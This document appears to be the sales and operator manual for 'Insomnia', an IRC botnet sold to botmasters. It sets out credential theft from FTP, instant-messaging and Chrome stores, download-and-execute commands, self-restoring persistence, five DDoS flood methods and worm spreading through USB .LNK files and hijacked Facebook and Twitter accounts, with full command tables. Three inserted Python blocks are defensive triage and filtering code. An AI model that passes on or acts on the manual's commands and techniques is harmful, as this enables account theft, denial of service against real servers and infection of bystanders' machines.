Table of Contents
1. Summary
2. Core Features
3. Malware Removal
4. SOCKS5
5. DDoS
6. Spreading Modules
7. Topic Generator Explained
8. Complete command list
Summary
Insomnia was developed in Visual Studio 2010 in C#. The binary is compiled against
version 2.0 of the .NET Framework. Insomnia was primarily designed for a botmaster
who plans to build a network of machines that have the .NET Framework installed.
Infection of newer operating systems was considered during development: Insomnia is
fully compatible with the Windows 8 Developer Preview at this time and should work
on the release builds.
Insomnia has been tested to function on Windows NT based operating systems,
specifically the following:
Windows XP
Windows Server 2003 / R2
Windows Vista
Windows Server 2008 / R2
Windows 7
Windows 8 Developer Preview
If Insomnia acquires administrative rights on the target machine, it installs its
persistence entry under HKLM rather than HKCU, so it runs under every user account
on the machine. It also makes use of Windows API calls that only work with elevated
privileges, which improves some of the malware removal features such as Ruskill.
On execution, Insomnia looks up its country from http://api.wipmania.com (an
outbound HTTP request made at startup). If that site cannot be reached, Insomnia
falls back to the system locale information.
Insomnia's nick generation pattern is built from several pieces of information.
Here is a breakdown:
n{US|XP-32a}dnskifj
The lowercase 'n' at the start signifies that Insomnia was installed within the
past hour, implying that it is most likely a new installation.
The next part is the GeoIP location of the PC Insomnia is running on, US being
the United States.
This is followed by the Windows version (here Windows XP, 32-bit). The lowercase
'a' signifies that the bot is running with administrative privileges; if the bot
is only running as a standard user, it shows a lowercase 'u' instead.
The rest of the nick is seven randomly generated characters, to avoid nick
collisions.
Core Features
Connection Information
Insomnia supports the IRC protocol, with or without SSL (Secure Sockets Layer)
connections. SSL is recommended: the downside of plaintext IRC connections is that
they are easily recognized, which puts Insomnia at risk of detection and exposes
the information exchanged on your network.
Insomnia can be compiled to support connections to multiple servers on request.
There is no limit at this time.
Quit Messages
IRC quit messages are chosen by listening for WM_QUERYENDSESSION. This lets Insomnia
include the reason the process is terminating when it is caused by a Windows session
closing. If the bot process is terminated abnormally or fails to acquire a reason,
the quit message is the standard "Connection reset by peer". Currently Insomnia
detects and outputs three types of quit message (note that Windows announces sleep
through WM_POWERBROADCAST with PBT_APMSUSPEND, not WM_QUERYENDSESSION, which only
covers logoff and shutdown):
Windows is shutting down…
Windows is logging off…
Windows is going to sleep…
Registry Persistence
Insomnia actively monitors the registry for changes by P/Invoking a series of Windows
API functions such as RegNotifyChangeKeyValue. If it finds that its registry key was
modified or deleted, it restores it immediately.
Core command list
These commands signify features that are found in the basic compile of Insomnia, and
are included in every binary available for purchase, without the addition of separate
modules.
Command                  Description
.v                       Outputs version, MD5 hash, process path, registry location.
.m on/off                Toggles mute (blocks all output).
.avinfo                  Displays the currently installed antivirus/firewall programs (Vista+).
.j #channel              Joins a channel.
.p #channel              Parts a channel.
.sort                    Sorts bots into channels based on their country (#US, #RU, etc.).
.unsort                  Parts the sorted channels.
.permsort                Sorts the bots based on privileges (#users/#admins).
.rm                      Completely removes Insomnia from the machine.
.rc                      Reconnects to IRC after waiting 10 seconds.
.ftp                     Outputs saved FTP credentials on the machine.
.im                      Outputs saved IM credentials on the machine.
.read URL                Reads encrypted topic commands from a remote URL.
.open FILE/URL           Opens a URL or file on the machine.
.open FILE/URL -h        Opens a URL or file on the machine but hides the window.
.dl URL                  Downloads a file and executes it.
.dl URL -m               Downloads a file and executes it in memory (.NET files only).
.dl URL -t X             Downloads a file, executes it and terminates it after X seconds have passed.
The rest of the commands are discussed in their appropriate sections below. You can
find a complete command list at the end of this document.
Malware Removal
Botkiller
Insomnia includes two types of malware removal commands:
Command                  Description
.bk                      Runs the standard botkiller module.
.bk -i                   Runs the botkiller module that terminates injected bots.
The standard botkiller module works around a counter system. It first scans temporary
folders, including %APPDATA%, for any executable files that are currently running. It
then checks whether those files have the "hidden" attribute. Other checks are then
performed, including checking the registry startup locations. If an executable
violates a certain number of these checks, it is considered "possibly malicious", and
Insomnia will terminate it, delete its registry key, and output any TCP connections
associated with that process.
The botkiller module that terminates injected bots uses a series of techniques to
remove nearly all bots that inject into explorer.exe or iexplore.exe.
The two commands perform different actions. If you want to give the best effort to
clean a system of other common malware, it is recommended that you run both.
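The counter system described above is the same scoring heuristic a triage script uses to pick out suspect autostart executables. The following is an added example for this page, not Insomnia's code: it scores constructed process records against the three checks the manual names (image under a temp or profile directory, hidden attribute on the image, referenced from a registry startup location) and reports, rather than terminates, those reaching an assumed threshold of two, together with their TCP connections. The process records, the profile paths in SUSPECT_ROOTS and the threshold are constructed assumptions; a real collector would fill them from the running system.

```python
from dataclasses import dataclass, field
from typing import List, Tuple
import ntpath


@dataclass
class ProcessRecord:
    """One running process as a triage collector would report it (constructed here)."""
    pid: int
    image_path: str
    hidden: bool                    # FILE_ATTRIBUTE_HIDDEN set on the image file
    in_startup_key: bool            # referenced from a Run/RunOnce autostart location
    tcp_connections: List[str] = field(default_factory=list)


# Assumed locations; a real collector expands %TEMP%, %APPDATA% and the Windows temp dir.
SUSPECT_ROOTS = [
    r"C:\Users\victim\AppData\Local\Temp",
    r"C:\Users\victim\AppData\Roaming",
    r"C:\Windows\Temp",
]


def _under(path: str, root: str) -> bool:
    """Case-insensitive 'path is root or inside root' test using Windows path rules."""
    p = ntpath.normcase(ntpath.normpath(path))
    r = ntpath.normcase(ntpath.normpath(root))
    return p == r or p.startswith(r + "\\")


def score_process(rec: ProcessRecord, roots=SUSPECT_ROOTS) -> Tuple[int, List[str]]:
    """Apply the three checks the manual names; one point per violation."""
    reasons = []
    if any(_under(rec.image_path, r) for r in roots):
        reasons.append("image runs from a temp or profile directory")
    if rec.hidden:
        reasons.append("image file carries the hidden attribute")
    if rec.in_startup_key:
        reasons.append("referenced from a registry startup location")
    return len(reasons), reasons


def triage(records, threshold: int = 2):
    """Report every process whose score reaches the threshold (2 is an assumed cut-off),
    together with the TCP connections a responder would want to see."""
    flagged = []
    for rec in records:
        score, reasons = score_process(rec)
        if score >= threshold:
            flagged.append({
                "pid": rec.pid,
                "path": rec.image_path,
                "score": score,
                "reasons": reasons,
                "tcp": list(rec.tcp_connections),
            })
    return flagged


# Constructed sample: one classic dropper, one browser, one installer running from
# %TEMP%, and one legitimate autostart entry under Program Files.
SAMPLE_PROCESSES = [
    ProcessRecord(1337, r"C:\Users\victim\AppData\Roaming\svchost32.exe", True, True,
                  ["10.0.0.5:49211 -> 198.51.100.7:6667"]),
    ProcessRecord(2048, r"C:\Program Files\Mozilla Firefox\firefox.exe", False, False,
                  ["10.0.0.5:49300 -> 203.0.113.9:443"]),
    ProcessRecord(3101, r"C:\Users\victim\AppData\Local\Temp\setup_tmp.exe", False, False),
    ProcessRecord(4096, r"C:\Program Files\Vendor\tray.exe", False, True),
]

if __name__ == "__main__":
    for hit in triage(SAMPLE_PROCESSES):
        print(hit)
```

The threshold is the whole point of a counter system: a single check (an installer in %TEMP%, a vendor tray app in a Run key) is common on clean machines, and only the combination is worth acting on. Lowering the threshold to one in the sample flags both of those benign records.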
Ruskill
Command                  Description
.dl URL -r               Starts the download and initiates the Ruskill module on the file.
Ruskill is initiated by calling the download function with the -r parameter. Files
downloaded with Ruskill enabled are monitored, and the information is output to the
Ruskill channel.
Ruskill attempts to discover all files dropped by that malware, along with all
registry keys created, and then reverses those changes the next time the PC reboots.
It uses a set of Windows API calls to make this possible, deleting target files after
AUTOCHK runs but before Windows creates any page files. Windows exposes exactly this
window through MoveFileEx with MOVEFILE_DELAY_UNTIL_REBOOT, which queues the path in
the PendingFileRenameOperations registry value for the session manager to act on at
the next boot; a responder can inspect that value to see what is queued. Administrative
rights affect how well this feature works.
Ruskill uses API calls similar to those in ngrBot, Autumn, other antivirus products and
File Assassin.
DDoS Functionality
Insomnia includes five different methods to initiate distributed denial of service
attacks. Two of them are aimed specifically at weaknesses in the Apache web server,
consuming all of its connection slots or its memory.
When a DDoS command is issued, Insomnia first stops all other active DDoS threads.
This frees threads for the new DDoS command while not consuming too many resources
client-side or saturating the upstream (which may cause the bot to disconnect
temporarily).
Command                        Description
.arme HOST TIME                Multithreaded Apache Remote Memory Exhaustion flood.
.slow HOST TIME                Multithreaded Slowloris flood.
.layer4 HOST PORT TIME         Multithreaded Layer 4 (SYN) flood.
.layer7 HOST PORT TIME         Multithreaded Layer 7 (HTTP GET) flood.
.udp HOST PORT TIME            Multithreaded UDP flood.
ARME (Apache Remote Memory Exhaustion)
This method is a modified port of the perl script published by Kingcope in August
2011 (the Apache Range header denial of service, CVE-2011-3192). Running it with
enough connections can cause Apache to swap to disk once RAM is consumed, and may
result in the process being terminated as the host system becomes unstable.
Higher-end servers may hold out; httpd 2.2.20 and later, and installations configured
to reject requests carrying many byte ranges, are not vulnerable.
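Since the ARME method is the Range header attack, the practical counterpart is a server-side check on Range headers. The Apache project's interim advice for CVE-2011-3192 was to drop the Range header from requests carrying five or more ranges (a SetEnvIf/RequestHeader rule). The function below is an added example for this page, not Insomnia's or Apache's code: it classifies a Range header value the same way in Python and additionally flags unsatisfiable and overlapping ranges, which a legitimate client never sends. The five-range cut-off is an assumption taken from that advice, and the sample header value is constructed.

```python
import re

# Assumed cut-off, taken from the Apache project's interim mitigation advice for
# CVE-2011-3192 (drop Range headers with five or more ranges).
MAX_RANGES = 5

_RANGE_SPEC = re.compile(r"^\s*(\d*)\s*-\s*(\d*)\s*$")


def parse_ranges(header_value):
    """Parse an HTTP/1.1 Range header value ("bytes=0-99,200-") into a list of
    (start, end) tuples; a missing bound is None. Returns None if malformed."""
    if not header_value.lower().startswith("bytes="):
        return None
    ranges = []
    for spec in header_value[len("bytes="):].split(","):
        m = _RANGE_SPEC.match(spec)
        if m is None or (m.group(1) == "" and m.group(2) == ""):
            return None
        start = int(m.group(1)) if m.group(1) else None
        end = int(m.group(2)) if m.group(2) else None
        ranges.append((start, end))
    return ranges


def range_verdict(header_value, max_ranges=MAX_RANGES):
    """Classify a Range header: 'ok', 'malformed', 'too-many-ranges',
    'unsatisfiable' (start after end) or 'overlapping'."""
    ranges = parse_ranges(header_value)
    if ranges is None:
        return "malformed"
    if len(ranges) > max_ranges:
        return "too-many-ranges"
    # Only fully specified ranges can be ordered and compared for overlap.
    explicit = sorted(r for r in ranges if r[0] is not None and r[1] is not None)
    for start, end in explicit:
        if start > end:
            return "unsatisfiable"
    for (_, prev_end), (start, _) in zip(explicit, explicit[1:]):
        if start <= prev_end:
            return "overlapping"
    return "ok"


def should_drop_range(header_value, max_ranges=MAX_RANGES):
    """Policy hook for a proxy or WAF: strip the header (and serve the full body)
    unless the request is a well-formed, bounded, non-overlapping range request."""
    return range_verdict(header_value, max_ranges) != "ok"


# Constructed sample in the shape of the published attack header: one open-ended
# range followed by many overlapping ranges that all start at byte 5.
SAMPLE_ABUSIVE_RANGE = "bytes=0-," + ",".join(f"5-{i}" for i in range(7))

if __name__ == "__main__":
    for value in ("bytes=0-1023", "bytes=0-99,50-149", SAMPLE_ABUSIVE_RANGE):
        print(f"{value[:40]:40} -> {range_verdict(value)}")
```

Dropping the header rather than rejecting the request is deliberate: a client that sent a bad Range still gets a correct 200 response with the whole resource, so the check cannot break legitimate downloads, only deny the attacker the amplification.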
Slowloris
This method was developed by RSnake and became widely known in 2009. This C# port
works the same way, but with random user agents, random content lengths and random
header data, so it is harder for the target to block. It also uses both GET and POST,
which seems to get better results than sticking with one method. Slowloris can take a
while to consume all the connection slots on the target, but on an unprotected server
it gets there eventually. Apache's mod_reqtimeout (RequestReadTimeout) bounds how long
a client may take to send its headers and body, and is the standard counter to this
technique.
Layer 7 (HTTP GET)
This method simply makes HTTP GET requests for the index page and downloads the page
data. It works well in high numbers. If you are focusing attacks on Apache web servers
with a small number of bots, the methods above are recommended.
Layer 4 (SYN)
This method uses SynSockets to flood the server with TCP connection attempts. It is not
hard to block server-side and is an older method, but if a server is vulnerable it is
highly effective.
UDP
This flood is ideal for residential connections, or for larger servers if you have the
bot count to do it, flooding with UDP packets containing random data.
SOCKS5 Module
Command                  Description
.socks                   Attempts to start the SOCKS5 server and reports back with results.
This command signals Insomnia to start the SOCKS5 server and test its connection. If
everything worked with no errors, it outputs IP:PORT and USER:PASS to IRC so you are
able to use them. It also attempts to map the port with the included UPnP library and
indicates in the output whether that succeeded.
<n{US|W7-64u}dnsmdks> [SOCKS]: Attempting to start SOCKS server…
<n{US|W7-64u}dnsmdks> [SOCKS]: Listening on [127.0.0.1:9001] [user:pass] [uPnP=yes]
Spreaders
USB .LNK Spread
This module runs automatically. On initial bot execution it scans for removable USB
media. When a drive is found, it scans it for folders, creates a corresponding .LNK
file for each and hides the originals. It also listens for new devices and infects
them as they are added. The module outputs to IRC after a successful infection.
<n{US|W7-64u}dnsmdks> [USB]: Completed LNK spread on (G:\) with 7 files.
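A responder handed a stick that produced the output line above needs to find which folders were hidden and shadowed by .LNK decoys. The following is an added example for this page, not Insomnia's code: find_lnk_decoys() takes one directory level as (name, is_dir, hidden) tuples and returns every .lnk whose stem matches a hidden sibling; collect_entries() builds such a listing from disk, reading the hidden flag from the Windows file attributes (always False on POSIX, where the attribute does not exist); triage_drive() walks a mounted drive with both. The function names are mine and the sample listing is constructed.

```python
import os
import tempfile
from typing import Iterable, List, Tuple

FILE_ATTRIBUTE_HIDDEN = 0x2   # Windows attribute bit; same value as stat.FILE_ATTRIBUTE_HIDDEN

Entry = Tuple[str, bool, bool]   # (name, is_dir, hidden)


def find_lnk_decoys(entries: Iterable[Entry]) -> List[Tuple[str, str]]:
    """Return (lnk_name, original_name) pairs for every .lnk in one directory level
    that shadows a hidden sibling of the same name: the pattern the spreader leaves."""
    entries = list(entries)
    hidden_by_stem = {name.lower(): name for name, _, hidden in entries if hidden}
    decoys = []
    for name, is_dir, _ in entries:
        if is_dir or not name.lower().endswith(".lnk"):
            continue
        stem = name[:-4].lower()
        if stem in hidden_by_stem:
            decoys.append((name, hidden_by_stem[stem]))
    return decoys


def collect_entries(path: str) -> List[Entry]:
    """Read one directory level from disk. The hidden flag comes from the Windows file
    attributes; on POSIX st_file_attributes does not exist and the flag is always False."""
    out = []
    with os.scandir(path) as it:
        for e in it:
            st = e.stat(follow_symlinks=False)
            attrs = getattr(st, "st_file_attributes", 0)
            out.append((e.name, e.is_dir(follow_symlinks=False),
                        bool(attrs & FILE_ATTRIBUTE_HIDDEN)))
    return out


def triage_drive(root: str) -> List[Tuple[str, str, str]]:
    """Walk a mounted drive and report (directory, lnk_name, original_name) per decoy."""
    findings = []
    for dirpath, _, _ in os.walk(root):
        for lnk, original in find_lnk_decoys(collect_entries(dirpath)):
            findings.append((dirpath, lnk, original))
    return findings


def self_check_collector() -> List[Entry]:
    """Build a throwaway directory holding a folder and a same-named .lnk and read it
    back, so collect_entries() can be exercised on any platform."""
    with tempfile.TemporaryDirectory() as d:
        os.mkdir(os.path.join(d, "Photos"))
        open(os.path.join(d, "Photos.lnk"), "wb").close()
        return sorted(collect_entries(d))


# Constructed listing of an infected stick's root: two hidden folders each shadowed
# by a .lnk, one untouched folder, a normal file and a hidden autorun.inf with no decoy.
SAMPLE_ROOT_LISTING: List[Entry] = [
    ("Photos", True, True),
    ("Photos.lnk", False, False),
    ("Work", True, True),
    ("Work.lnk", False, False),
    ("Music", True, False),
    ("readme.txt", False, False),
    ("autorun.inf", False, True),
]

if __name__ == "__main__":
    print(find_lnk_decoys(SAMPLE_ROOT_LISTING))
    print(self_check_collector())
```

The listing-based function is kept separate from the disk reader on purpose: the hidden attribute only exists on NTFS/FAT mounted under Windows, so the decision logic can be tested anywhere while the collector is run on the machine where the stick is plugged in. Recovery is then the inverse of the spreader: delete the .lnk and clear the hidden attribute on the original.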
Twitter
Command                  Description
.twitter "msg"           Updates the Twitter status of accounts found on the system.
This module queries the Chrome grabber for accounts matching twitter.com and attempts
to log in. If the login succeeds, it updates the status to the specified message. This
does NOT use the Twitter API and does NOT require OAuth: it simulates the HTTP requests
a real browser makes to log in to Twitter and update the status.
<n{US|W7-64u}dnsmdks> [TWITTER]: Status updated. (user@email.com => "msg")
Facebook
Command                  Description
.facebook "msg"          Starts the Facebook spread module with the specified message.
This module queries the Chrome grabber for accounts matching facebook.com and attempts
to log in. If the login succeeds, it gathers the account information required to log
in to Facebook chat via the XMPP protocol. Once the data is acquired, resources are
disposed of and a chat session is started with the user's credentials. Once the module
has access to the chat system, it begins sending the message you provided with the
given options.
You can specify to send only to online or offline friends with the corresponding
parameters. You can also send to a certain number of friends (chosen at random) by
using the -f parameter followed by a number of your choice.
<n{US|W7-64u}dnsmdks> [FACEBOOK]: Spreader module started. (user@email.com => "msg")
Topic Generator
Insomnia comes with a topic generation utility to help you secure your topic commands
from prying eyes and to simplify commands that should be performed in sequence.
To use it, run the topic generator included with your purchase. Each customer gets a
topic generator that encrypts based on their unique customer ID, so no one else's
topic generator can interact with your binary, which is compiled with the same
customer ID.
To use the Topic Generator, type in the commands exactly as you would in IRC, then
click Add. The topic generator adds them to the list view, automatically parsing and
detecting the parameters.
When you are finished, click Generate and use the topic in IRC. If a topic is too big
for the IRC topic character limit, you can host the encrypted commands and set the
topic to the encrypted form of .read http://yoururl.com/commands.txt
Complete Command List
Command                        Description
.v                             Outputs version, MD5 hash, process path, registry location.
.m on/off                      Toggles mute (blocks all output).
.avinfo                        Displays the currently installed antivirus/firewall programs (Vista+).
.j #channel                    Joins a channel.
.p #channel                    Parts a channel.
.sort                          Sorts bots into channels based on their country (#US, #RU, etc.).
.unsort                        Parts the sorted channels.
.permsort                      Sorts the bots based on privileges (#users/#admins).
.rm                            Completely removes Insomnia from the machine.
.rc                            Reconnects to IRC after waiting 10 seconds.
.ftp                           Outputs saved FTP credentials on the machine.
.im                            Outputs saved IM credentials on the machine.
.read URL                      Reads encrypted topic commands from a remote URL.
.open FILE/URL                 Opens a URL or file on the machine.
.open FILE/URL -h              Opens a URL or file on the machine but hides the window.
.dl URL                        Downloads a file and executes it.
.dl URL -m                     Downloads a file and executes it in memory (.NET files only).
.dl URL -t X                   Downloads a file, executes it and terminates it after X seconds have passed.
.dl URL -r                     Downloads a file with Ruskill and outputs to the Ruskill channel.
.socks                         Attempts to start the SOCKS5 server.
.speedtest URL                 Downloads the URL and outputs speed information.
.bk                            Standard botkiller module.
.bk -i                         Injected botkiller module.
.getadmin                      Added by request. Prompts UAC for admin; if acquired, restarts.
.acc keyword                   Chrome grabber based on URL keyword. Leave keyword blank for all.
.twitter "msg"                 Updates the Twitter status of accounts found on the system (see Spreaders).
.facebook "msg"                Starts the Facebook spread module with the specified message (see Spreaders).
.arme HOST TIME                Multithreaded Apache Remote Memory Exhaustion flood.
.slow HOST TIME                Multithreaded Slowloris flood.
.layer4 HOST PORT TIME         Multithreaded Layer 4 (SYN) flood.
.layer7 HOST PORT TIME         Multithreaded Layer 7 (HTTP GET) flood.
.udp HOST PORT TIME            Multithreaded UDP flood.